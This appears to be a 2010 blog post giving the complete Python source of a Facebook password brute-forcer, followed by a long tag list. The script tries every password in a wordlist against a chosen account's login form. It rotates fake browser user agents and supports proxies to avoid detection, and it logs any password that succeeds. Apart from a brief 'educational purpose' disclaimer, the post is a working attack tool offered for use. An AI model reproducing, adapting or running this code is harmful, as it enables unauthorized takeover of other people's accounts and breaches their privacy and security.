#!/usr/bin/python # This is facebook bruteforcer tools # This was written for educational purpose and pentest only. Use it at your own risk. # Author will not be responsible for any damage !! # Toolname : facebookbruteforcer.py # Programmer : Gunslinger_ <yudha.gunslinger@gmail.com> # Version : 1.0 # Date : Tue Jul 27 13:24:44 WIT 2010 # Special thanks to mywisdom to inspire me ;) import re import os import sys import random import warnings import time try: import mechanize except ImportError: print "[*] Please install mechanize python module first" sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) try: import cookielib except ImportError: print "[*] Please install cookielib python module first" sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning) # define variable __programmer__ = "gunslinger_ <yudha.gunslinger@gmail.com>" __version__ = "1.0" verbose = False useproxy = False usepassproxy = False log = 'fbbruteforcer.log' file = open(log, "a") success = 'http://www.facebook.com/?sk=messages&ref=mb' fblogin = 'https://login.facebook.com/login.php?login_attempt=1' # some cheating .. ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Opera/8.00 (Windows NT 5.1; U; en)', 'amaya/9.51 libwww/5.4.0', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]' ] facebook = ''' __ _ _ / _| | | | | | |_ __ _ ___ ___| |__ ___ ___ | | __ | _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ / | || (_| | (_| __/ |_) | (_) | (_) | < |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\ bruteforcer... Programmer : %s Version : %s''' % (__programmer__, __version__) option = ''' Usage : %s [options] Option : -u, --username <username> | User for bruteforcing -w, --wordlist <filename> | Wordlist used for bruteforcing -v, --verbose | Set %s will be verbose -p, --proxy <host:port> | Set http proxy will be use -k, --usernameproxy <username> | Set username at proxy will be use -i, --passproxy <password> | Set password at proxy will be use -l, --log <filename> | Specify output filename (default : fbbruteforcer.log) -h, --help <help> | Print this help Example : %s -u brad@hackme.com -w wordlist.txt" P.S : add "&" to run in the background ''' % (sys.argv[0], sys.argv[0], sys.argv[0]) hme = ''' Usage : %s [option] -h or --help for get help ''' % sys.argv[0] def helpme(): print facebook print option file.write(facebook) file.write(option) sys.exit(1) def helpmee(): print facebook print hme file.write(facebook) file.write(hme) sys.exit(1) for arg in sys.argv: try: if arg.lower() == '-u' or arg.lower() == '--user': username = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-w' or arg.lower() == '--wordlist': wordlist = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-l' or arg.lower() == '--log': log = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-p' or arg.lower() == '--proxy': useproxy = True proxy = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-k' or arg.lower() == '--userproxy': usepassproxy = True usw = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-i' or arg.lower() == '--passproxy': usepassproxy = True usp = sys.argv[int(sys.argv[1:].index(arg))+2] elif arg.lower() == '-v' or arg.lower() == '--verbose': verbose = True elif arg.lower() == '-h' or arg.lower() == '--help': helpme() elif len(sys.argv) <= 1: helpmee() except IOError: helpme() except NameError: helpme() except IndexError: helpme() def bruteforce(word): try: sys.stdout.write("\r[*] Trying %s... " % word) file.write("[*] Trying %s\n" % word) sys.stdout.flush() br.addheaders = [('User-agent', random.choice(ouruseragent))] opensite = br.open(fblogin) br.select_form(nr=0) br.form['email'] = username br.form['pass'] = word br.submit() response = br.response().read() if verbose: print response if success in response: print "\n\n[*] Logging in success..." print "[*] Username : %s" % (username) print "[*] Password : %s\n" % (word) file.write("\n[*] Logging in success...") file.write("\n[*] Username : %s" % (username)) file.write("\n[*] Password : %s\n\n" % (word)) sys.exit(1) except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) except mechanize._mechanize.FormNotFoundError: print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n" file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n") sys.exit(1) except mechanize._form.ControlNotFoundError: print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n" file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n") sys.exit(1) def releaser(): global word for word in words: bruteforce(word.replace("\n","")) def main(): global br global words try: br = mechanize.Browser() cj = cookielib.LWPCookieJar() br.set_cookiejar(cj) br.set_handle_equiv(True) br.set_handle_gzip(True) br.set_handle_redirect(True) br.set_handle_referer(True) br.set_handle_robots(False) br.set_debug_http(False) br.set_debug_redirects(False) br.set_debug_redirects(False) br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) if useproxy: br.set_proxies({"http": proxy}) if usepassproxy: br.add_proxy_password(usw, usp) if verbose: br.set_debug_http(True) br.set_debug_redirects(True) br.set_debug_redirects(True) except KeyboardInterrupt: print "\n[*] Exiting program...\n" file.write("\n[*] Exiting program...\n") sys.exit(1) try: preventstrokes = open(wordlist, "r") words = preventstrokes.readlines() count = 0 while count < len(words): words[count] = words[count].strip() count += 1 except IOError: print "\n[*] Error: Check your wordlist path\n" file.write("\n[*] Error: Check your wordlist path\n") sys.exit(1) except NameError: helpme() except KeyboardInterrupt: print "\n[*] Exiting program...\n" file.write("\n[*] Exiting program...\n") sys.exit(1) try: print facebook print "\n[*] Starting attack at %s" % time.strftime("%X") print "[*] Account for bruteforcing %s" % (username) print "[*] Loaded :",len(words),"words" print "[*] Bruteforcing, please wait..." file.write(facebook) file.write("\n[*] Starting attack at %s" % time.strftime("%X")) file.write("\n[*] Account for bruteforcing %s" % (username)) file.write("\n[*] Loaded : %d words" % int(len(words))) file.write("\n[*] Bruteforcing, please wait...\n") except KeyboardInterrupt: print "\n[*] Exiting program...\n" sys.exit(1) try: releaser() bruteforce(word) except NameError: helpme() if __name__ == '__main__': main()July 27, 2010 | Categories: Tools | Tags: 'amaya/9.51 libwww/5.4.0', 'Microsoft Internet Explorer/4.0b1 (Windows 95)', 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)', 'Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)', 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)', 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;', 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)', 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre', 'Opera/8.00 (Windows NT 5.1; U; en)', about, account, ads, allow, amazing, application, asshole, atacker, attack, attempt, beware, bomber, bot, brandwein, brute, caution, china, click, comment, connections, cookielib, dangerous, darkc0de, database, db, developer, devilzc0de, dhcp, easy, echo, except, exploit, external, facebook, fool, forcer, freeze, friend, fun, funny, gathering, hack, hacked, hacker, hacking, how, icmp, idiot, in, indonesia, info, information, injector, internal, internet, its, jasakom, learn, legendary, leonard, linux, login, lunak, mechanize, missconfiguration, module, more, my, network, new, not, own, password, perangkat, post, programmer, project, pwned, python, robot, send, setting, show, simulation, socket, states, strategies, stupid, sunglasses, technique, time, to, Tools, united, unix, url, user, who, windows, works, written, you | 62 Comments »